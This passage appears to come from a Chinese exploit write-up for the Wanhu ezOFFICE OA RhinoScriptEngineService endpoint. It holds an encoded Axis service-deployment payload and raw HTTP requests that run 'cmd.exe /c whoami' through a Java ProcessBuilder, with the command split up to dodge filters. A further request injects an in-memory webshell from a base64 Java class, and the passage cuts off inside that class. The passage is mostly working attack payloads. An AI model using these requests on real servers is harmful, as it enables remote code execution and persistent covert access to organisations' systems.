x77;&#x73;&#x64;&#x64;&#x25;&#x32;&#x46;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x78;&#x6d;&#x6c;&#x6e;&#x73;&#x25;&#x33;&#x41;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x68;&#x74;&#x74;&#x70;&#x25;&#x33;&#x41;&#x25;&#x32;&#x46;&#x25;&#x32;&#x46;&#x78;&#x6d;&#x6c;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x6f;&#x72;&#x67;&#x25;&#x32;&#x46;&#x61;&#x78;&#x69;&#x73;&#x25;&#x32;&#x46;&#x77;&#x73;&#x64;&#x64;&#x25;&#x32;&#x46;&#x70;&#x72;&#x6f;&#x76;&#x69;&#x64;&#x65;&#x72;&#x73;&#x25;&#x32;&#x46;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x32;&#x32;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x73;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x52;&#x68;&#x69;&#x6e;&#x6f;&#x53;&#x63;&#x72;&#x69;&#x70;&#x74;&#x45;&#x6e;&#x67;&#x69;&#x6e;&#x65;&#x53;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x70;&#x72;&#x6f;&#x76;&#x69;&#x64;&#x65;&#x72;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x33;&#x41;&#x52;&#x50;&#x43;&#x25;&#x32;&#x32;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x4e;&#x61;&#x6d;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x76;&#x61;&#x6c;&#x75;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x52;&#x68;&#x69;&#x6e;&#x6f;&#x53;&#x63;&#x72;&#x69;&#x70;&#x74;&#x45;&#x6e;&#x67;&#x69;&#x6e;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x25;&#x32;&#x46;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x61;&#x6c;&#x6c;&#x6f;&#x77;&#x65;&#x64;&#x4d;&#x65;&#x74;&#x68;&#x6f;&#x64;&#x73;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x76;&#x61;&#x6c;&#x75;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x65;&#x76;&#x61;&#x6c;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x25;&#x32;&#x46;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x74;&#x79;&#x70;&#x65;&#x4d;&#x61;&#x70;&#x70;&#x69;&#x6e;&#x67;&#x25;&#x32;&#x30;&#x64;&#x65;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x65;&#x72;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x61;&#x78;&#x69;&#x73;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x2e;&#x73;&#x65;&#x72;&#x2e;&#x42;&#x65;&#x61;&#x6e;&#x44;&#x65;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x65;&#x72;&#x46;&#x61;&#x63;&#x74;&#x6f;&#x72;&#x79;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x74;&#x79;&#x70;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x33;&#x41;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x53;&#x69;&#x6d;&#x70;&#x6c;&#x65;&#x53;&#x63;&#x72;&#x69;&#x70;&#x74;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x78;&#x74;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x71;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6e;&#x73;&#x25;&#x33;&#x41;&#x53;&#x69;&#x6d;&#x70;&#x6c;&#x65;&#x53;&#x63;&#x72;&#x69;&#x70;&#x74;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x78;&#x74;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x65;&#x72;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x61;&#x78;&#x69;&#x73;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x2e;&#x73;&#x65;&#x72;&#x2e;&#x42;&#x65;&#x61;&#x6e;&#x53;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x65;&#x72;&#x46;&#x61;&#x63;&#x74;&#x6f;&#x72;&#x79;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x78;&#x6d;&#x6c;&#x6e;&#x73;&#x25;&#x33;&#x41;&#x6e;&#x73;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x75;&#x72;&#x6e;&#x25;&#x33;&#x41;&#x62;&#x65;&#x61;&#x6e;&#x73;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x72;&#x65;&#x67;&#x65;&#x6e;&#x65;&#x72;&#x61;&#x74;&#x65;&#x45;&#x6c;&#x65;&#x6d;&#x65;&#x6e;&#x74;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x25;&#x32;&#x32;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x74;&#x79;&#x70;&#x65;&#x4d;&#x61;&#x70;&#x70;&#x69;&#x6e;&#x67;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x64;&#x65;&#x70;&#x6c;&#x6f;&#x79;&#x6d;&#x65;&#x6e;&#x74;&#x22;&#x20;&#x3e;&#x0a;&#x5d;&#x3e;&#x0a;&#x3c;&#x6e;&#x61;&#x6d;&#x65;&#x3e;&#x26;&#x6e;&#x61;&#x6d;&#x65;&#x3b;&#x3c;&#x2f;&#x6e;&#x61;&#x6d;&#x65;&#x3e;</gen:input>
      </gen:OAManager>
   </soapenv:Body>
</soapenv:Envelope>
image-20240519135045239
执行命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONIDOA=D7AA7CDC820C702A5A45F51AAB4B677A; LocLan=zh_CN; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserPortal=; ezofficePortal3=1; OASESSIONID=509378B8F4156297A82C8899060A9FBE; ezofficeUserName=admin; ezofficePortal0=; SESSIONIDOA=05A06A3BF1E3D38195AB69663E791C25
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.20.10.132:7001
Content-Length: 866

<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com"><soapenv:Body><eval xmlns="http://127.0.0.1:8080/services/scriptEngine"><arg0 xmlns="">
<![CDATA[function test(){    var cmd1 = 'c';    cmd1 += 'm';    cmd1 += 'd';    cmd1 += '.';    cmd1 += 'e';    cmd1 += 'x';    cmd1 += 'e';    var cmd2 = '/';    cmd2 += 'c';    var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'whoami');    var process = pb.start();    var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();    return ret;}   test();]]></arg0><arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
</arg1></eval></soapenv:Body></soapenv:Envelope>
image-20240519135113917
打内存马
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONIDOA=D7AA7CDC820C702A5A45F51AAB4B677A; LocLan=zh_CN; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserPortal=; ezofficePortal3=1; OASESSIONID=509378B8F4156297A82C8899060A9FBE; ezofficeUserName=admin; ezofficePortal0=; SESSIONIDOA=05A06A3BF1E3D38195AB69663E791C25
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.20.10.132:7001
Content-Length: 17184

<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com"><soapenv:Body><eval xmlns="http://127.0.0.1:8080/services/scriptEngine"><arg0 xmlns="">
<![CDATA[function test(){var classLoader = java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apache.commons.lang.be.CSVUtil').newInstance();}catch (e){var clsString = classLoader.loadClass('java.lang.String');var bytecodeBase64 = 'yv66vgAAADEBewEAIm9yZy9hcGFjaGUvY29tbW9ucy9sYW5nL2JlL0NTVlV0aWwHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAMZ2V0Q2xhc3NOYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAARDb2RlAQA0b3JnLmFwYWNoZS5jb21tb25zLmxhbmcuU2VydmxldENvbnRleHRXYnFzYmtMaXN0ZW5lcggACAEAD2dldEJhc2U2NFN0cmluZwEACkV4Y2VwdGlvbnMBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwAMAQAQamF2YS9sYW5nL1N0cmluZwcADgEL6Eg0c0lBQUFBQUFBQUFKMVhlVnhVMXhYK0xqUHdobUUwY1ZBVWJaTzRzd3dNRWhTRUxBSkNJQUlhSjhFZ01lMWplTURUWVdaNDd3MFIyNWcydFduU3B1bmVOTjJYcExTTmJiV05nMG8xeGk1cDAzMUo5MzF2MnY3ZmY5TDB1Kzg5QmhnRzhkY2Z3MXZ1UGVjNzUzNW51ZmU5OE4vekZ3RnN3NzhGNmhMR2NGaE5xdEVSTFJ4TmpJNG00bVk0cHNhSHd4SE5HSTlwVm1zaWJtbEhyUU1EWStiQWtTN2R0TFM0WmlnUUFxc09xK09xSTlzYVUwMnpLNkVPeWltUHdDWTVkVFJzT2hBelVQdTFzWlJtV3JNZytRSUZOK2x4M2JwRndGTlczaXZnYlUwTWFnTFhkT2x4clNjMU9xQVpkNm9ETVk0RXV4SlJOZGFyR3JwOGR3ZTkxb2h1Q3V6bytuL1cwQlNBQXA4Zlhpd1hXRnZXbFhNMVRkSXBFUlZZdmNpOEJMbFdnaFJUYnBpa2xQVzNsR2ZMTm5GdVFDQ3Z2MFdnYUZBYjR1THNjY0pTdkxOem9VSUFwVmdyWWRjSlhHczR2TzNtdjVHWTBBWUZ0amp1THNadzI3Z1d0MnpYaTgyRkV3SWJyMEtibEx0Mk94a2dYWTNweDZUbDRsbFAyNDVHdGFTbEorSUtObkRoTG1iVW1FaGFpWENybmh3aFBRSStRek9UREFqRGxlMzBpR1Vsd3gyOFpPdzdrdFJTVE0wMENTMXd3K0pLdGdTRlBZbUJ3ekpuYk5kU2xoNExkNnRKQ2VJdVFHRHJrcFp0UWVxc1g1SVpCVlVDbTY4S1QwR1lzYnE2UlN2WUpuRGRsZGVxNEVhQlpmT1dxV0E3aHlLV0dqM0NON2N1Vmd4cjFueFB5R05aK1JXanpwUnJ3RTQvcXRFbzRCL1JaSGIzcUtOMjZjM0dQR0laZW55WXNqZmg1a0xrZ1lWYlNHTWR0bmdtTCtmSmx1ZFMzNFhtSXRSQTFvTmpxbGVOcGJRQWRqdXdiY3o2YkMwRnR6R2JvaXhsVlkremROYk5LOWtSMVlqSWhjU2pXbFA1d1FBNmNic2ZIZGdqVURJOFMzSzdrUmpOTUhMSDB2bm9NSk5OM0tKNUcwQTNldnowZnk4cHRHUGdKdkdHQmVRdlNPTUE3c0IreVVtRThac05jWWRxanRoaHZzdVBYaXozb1pMNW5relIvWWE1Njk4N2NGaUxXazBMUjhvWERnWFFoNE5GMklGK0h6YjdzSlhOS2VYRGE5aE9rMnc5QWFoT0ROaXdmRFJrQjRZVmxDT3lPYXoxQmpBSXJRaDFHS0tmelcwUkgwYmNwcEhWR2hTd1pvdElVbWZjdEZTR1RhQjgwZXpKYmlzQnhERHF4eEdRMit2bkNaaEpMY3JNamhxYXRVZWJpUEJOUVpJcm9hR1dDVXRqM25qTHl2dGJBakJneWdTeG5CNmN3M0N2Yk8zamZvemhQaXJKWFVxS2RqcVNwaFpOR2JvMUVhWVJXM1FDeDZRL3I1dVh1QTRyQ3U1M0hIQjdmbkZacm43L0FON2d4M0c4a1kwc2ExTEJtd1NXeitnNys0NUE2VUtVekpiMFpqemt4d204UmFaaXNWT2grOTBLWFR1anBpZkNMYW1oSWMzUUJwMDU2cjBWYjVNWitDaUxKcmVNZ3Nmc2pxNE95ZzFhWUdWWnp1cCtKOTdseHp2d2JvSEFnR3BxTytwMmExRjdYeS9KRldFWmpmZmlmZExaOTdOcER5YmE5YmdhNDlGQWJxVnk4Z040UW5MN3dRQldvVVNLZlppWkU5ZnVtODJjK1g1azh2eWorSmprNGVQRVlpbXJNVlB1enpteWx2M2lrL2lVcFA5SkZtNW1YNk40UHFscjcxMnkySEswdW93VGsvaU05UG16Ym5kM1puc1NrVlIwcEYzWFlvTnp0dEdubVdqanFyRjladGRiWExiSmtheVozNTFkbTg3Y051ZFd5MVNaSTJKb1F6SEtoRzA0VjVLYnlvb2NSNWJWaTJncFNEUExTUXlqR2xPWkcvYW9RTlVTelgrKzZRRE80cHlNem5udVg3SlhwcEthRVkzWkhlZ3JzaFpPNEVKV3VPWlY1ck4rbk1RbDZwcWExUnlOeWk3cW5BbkxEa3FCeS9pcUgxUDRHcnNRd2JOMnBpdjF4bS9nZWFuNFRjYWUzaHc3SmpQU3psNWo1b3lUZGZxUkJ4QWV6SmpjWmlwZVBhcWIwZXFXNWtqYlROSWJQbnlQR0VNSmR6ZmR2QVJMTS8zZ0IvaWg1T0JIckNISHZsT0pQdnpFS2VodXpScEprUFZkT2ZENkYrRGxpb09EUUZNL3hjK2txWjhMckZsTVNzRXZXVVI2ZkR4eGhHdlltWVBNL3F2azk5ZjRqUisvd204VnJIRjdaYlhjNktwYjdFYmh3eCtjclRORDNwOW8xeUhBaDc5UW82NjJmcUNoZHZ2TyttMDFxalpZczlPSHYxSGpMdTZyVmMzRFBKNzU4QS9TM2FzUHg4WU1ibXYveEhvV254ZEVnWWRYYm03ODhoSHkvR0xmZDl0M0g1OFUrMXJJdHpacUNONVhWMHpobW9yZzM4OGdXaEY4NlF4dXJRais2d3phVDNNcUQzNWVaVjBESmZ4YmpTSStCUncxM3BmWjRQdzBjQ0gzVVZMS3JxbW9uTUxLcFRIWEVtV2RqVm5pNkxtWThta0Zna1FWc2htNjZEZHpnVktxc0tMU1UzbHhDcTg2bFlFcnNGMjZmZzVVWVFhcWtFYlcyRkN2eG5VdTFIWmJrODZmem9MWU5BZENaQ0M0L2VJR0cyTDlESVI0a2hvSzV5NVhwdEYwQ1RYZG9ZcG5jT3M1dE9heHVKNmVmZUZEZXhwZFQrRHhpdEFVOXZXRXp1Rk9nVWJ2TkhyN3BuQ2dNYjgwUDNnM0IrL3g0QUFmRDFWbEh1OHQ5YnJQM3VCckNSTTloMkVQZ3ZwWkpCb0xTZ3Z5cHpIV0o0ZlRTQVgxS1J4TjQvWFR5T3VyU09QQk5CNmV3aU9sQlJVRWZydEFHdTlKNC9FMFBwVEdSOUw0UkdsK0drOGRtRVIrWThFa3ZEMm41VEdJZldvYUc1a2NGM0NKZDQvTlNUdWpBR3psYURuL0toQkdKZW9SNHJtMkNudDRodTdseUFBL3NCT294VGh1eEtNOEVaM2xrV3VhQkY5QUk1RWE4QnlUVUhMYUljOFphQ0hpSmpJWHhtUFlqQzIwVTQrSGFLR01zZDJGKzIwcitaTFZEUGVYWGU1OU9FL3JJZnBhejlFdDhMNUNNd1VLOGhSVUs2aFJVS3VnVHFGeG9XRGpmeUJhZUpPeDVWbVYxMDlUUjViSFJqdjhIUnlSVmtLaXV6SjQ5MWw4TG5pSWwwdW83WjVFYVUvbG5EZGZvM2NTSHY1Q3AremNYb0dWeEZoRm56WkllSHJMalkvakV2VkZya2FpTm9odUdZT2VxdUR4cDFCU3hmeVlKdEt5Um05VkdoZDdKbDk1S2ZROEF0TTQyY2NpZWU3WmtEZU5yNGVvOEsxVDlHOFppcGw5SjEzK2E4a0MwRXI4M1dTdm5iTWRuTytreE8xTTZUMU02QzV5czVlTTdtTkU5bE0rWW5OZFJ6L1c4UC96K0FKWFRZL3dSWnl5Mld6QWFkWVJQOUpKMUpmd1pkNzVSWVpuY01hT0JMZys3OHRRRkV3cE9OR2o0R1JoWUE1MVFoNWczTVcrekNES3hVNEV2MzhXUCs0T0JWLzBYc0NKUGsrd0k1TEdMMExNTXI0ZjcvTlU4dlYzbC9EN3pPOVVkL0NQMUNBN2YvWlFnOEtDOStPVWF2U1drb3NIZzMrZGkxVHFYUXpIcnRjYWVqK1RyV3ZwRW5qcUw4QkJqdmFUalh1NDNrUGs2RjZibFZzNFU4QWNlb0dyemVOTXMvM2s0WHdWdmsxK3ZOUzRqWng5eDY3K2lVd0dUdUM3Tm1mMVRwY1lrNGsxU3dyK0I3amErOUJuRWdBQQgAEAEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAEgATCgAPABQBAAMoKVYBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAXAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAIbGlzdGVuZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdjb250ZXh0AQAIY29udGV4dHMBABBMamF2YS91dGlsL0xpc3Q7AQAEdGhpcwEAJExvcmcvYXBhY2hlL2NvbW1vbnMvbGFuZy9iZS9DU1ZVdGlsOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBACRMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAA5qYXZhL3V0aWwvTGlzdAcAJAEAEmphdmEvdXRpbC9JdGVyYXRvcgcAJgEADVN0YWNrTWFwVGFibGUMABIAFgoABAApAQAKZ2V0Q29udGV4dAEAEigpTGphdmEvdXRpbC9MaXN0OwwAKwAsCgACAC0BAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsMAC8AMAsAJQAxAQAHaGFzTmV4dAEAAygpWgwAMwA0CwAnADUBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMADcAOAsAJwA5AQALZ2V0TGlzdGVuZXIBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAOwA8CgACAD0BAAthZGRMaXN0ZW5lcgEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspVgwAPwBACgACAEEBAARrZXkxAQAIY2hpbGRyZW4BABNMamF2YS91dGlsL0hhc2hNYXA7AQADa2V5AQALY2hpbGRyZW5NYXABAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsHAE0BABBqYXZhL2xhbmcvVGhyZWFkBwBPAQARamF2YS91dGlsL0hhc2hNYXAHAFEBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwBTCgBUACkBAApnZXRUaHJlYWRzCABWAQAMaW52b2tlTWV0aG9kAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAFgAWQoAAgBaAQAHZ2V0TmFtZQwAXAAGCgBQAF0BABxDb250YWluZXJCYWNrZ3JvdW5kUHJvY2Vzc29yCABfAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAGEAYgoADwBjAQAGdGFyZ2V0CABlAQAFZ2V0RlYMAGcAWQoAAgBoAQAGdGhpcyQwCABqCABEAQAGa2V5U2V0AQARKClMamF2YS91dGlsL1NldDsMAG0AbgoAUgBvAQANamF2YS91dGlsL1NldAcAcQsAcgAxAQADZ2V0DAB0ADwKAFIAdQEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAdwB4CgAEAHkBAA9qYXZhL2xhbmcvQ2xhc3MHAHsKAHwAXQEAD1N0YW5kYXJkQ29udGV4dAgAfgEAA2FkZAEAFShMamF2YS9sYW5nL09iamVjdDspWgwAgACBCwAlAIIBABVUb21jYXRFbWJlZGRlZENvbnRleHQIAIQBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DACGAIcKAFAAiAEACHRvU3RyaW5nDACKAAYKAHwAiwEAGVBhcmFsbGVsV2ViYXBwQ2xhc3NMb2FkZXIIAI0BAB9Ub21jYXRFbWJlZGRlZFdlYmFwcENsYXNzTG9hZGVyCACPAQAJcmVzb3VyY2VzCACRCAAdAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24HAJQBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYMABIAlgoAlQCXAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24HAJkBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwCbAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgcAnQEACVNpZ25hdHVyZQEAJigpTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQATamF2YS9sYW5nL1Rocm93YWJsZQcAoQEACWNsYXp6Qnl0ZQEAAltCAQALZGVmaW5lQ2xhc3MBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAAtjbGFzc0xvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwCrAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DACtAK4KAFAArwEADmdldENsYXNzTG9hZGVyDACxAIcKAHwAsgwABQAGCgACALQBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAC2ALcKAKwAuAEAC25ld0luc3RhbmNlDAC6ADgKAHwAuwwACgAGCgACAL0BAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDAC/AMAKAAIAwQEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDADDAMQKAAIAxQgApQcApAEAEWphdmEvbGFuZy9JbnRlZ2VyBwDJAQAEVFlQRQwAywCoCQDKAMwBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAM4AzwoAfADQAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwDSAQANc2V0QWNjZXNzaWJsZQEABChaKVYMANQA1QoA0wDWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMANgA2QoAygDaAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DADcAN0KANMA3gEAB29iamVjdHMBABNbTGphdmEvbGFuZy9PYmplY3Q7AQAJbGlzdGVuZXJzAQAJYXJyYXlMaXN0AQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAKaXNJbmplY3RlZAEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspWgwA5QDmCgACAOcBABthZGRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXIIAOkBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAFgA6woAAgDsAQAcZ2V0QXBwbGljYXRpb25FdmVudExpc3RlbmVycwgA7gcA4QEAEGphdmEvdXRpbC9BcnJheXMHAPEBAAZhc0xpc3QBACUoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS91dGlsL0xpc3Q7DADzAPQKAPIA9QEAGShMamF2YS91dGlsL0NvbGxlY3Rpb247KVYMABIA9woAVAD4CgBUAIIBABxzZXRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXJzCAD7AQAHdG9BcnJheQEAFSgpW0xqYXZhL2xhbmcvT2JqZWN0OwwA/QD+CgBUAP8BAAFpAQABSQEADWV2aWxDbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAARzaXplAQADKClJDAEFAQYKAFQBBwEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwwAdAEJCgBUAQoBAAxkZWNvZGVyQ2xhc3MBAAdkZWNvZGVyAQAHaWdub3JlZAEACWJhc2U2NFN0cgEAFExqYXZhL2xhbmcvQ2xhc3M8Kj47AQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcggBEQEAB2Zvck5hbWUMARMAtwoAfAEUAQAMZGVjb2RlQnVmZmVyCAEWAQAJZ2V0TWV0aG9kDAEYAM8KAHwBGQEAEGphdmEudXRpbC5CYXNlNjQIARsBAApnZXREZWNvZGVyCAEdAQAGZGVjb2RlCAEfAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24HASEBAA5jb21wcmVzc2VkRGF0YQEAA291dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAJpbgEAHkxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtOwEABnVuZ3ppcAEAH0xqYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbTsBAAZidWZmZXIBAAFuAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0HASwBABxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtBwEuAQAdamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW0HATAKAS0AKQEABShbQilWDAASATMKAS8BNAEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwAEgE2CgExATcBAARyZWFkAQAFKFtCKUkMATkBOgoBMQE7AQAFd3JpdGUBAAcoW0JJ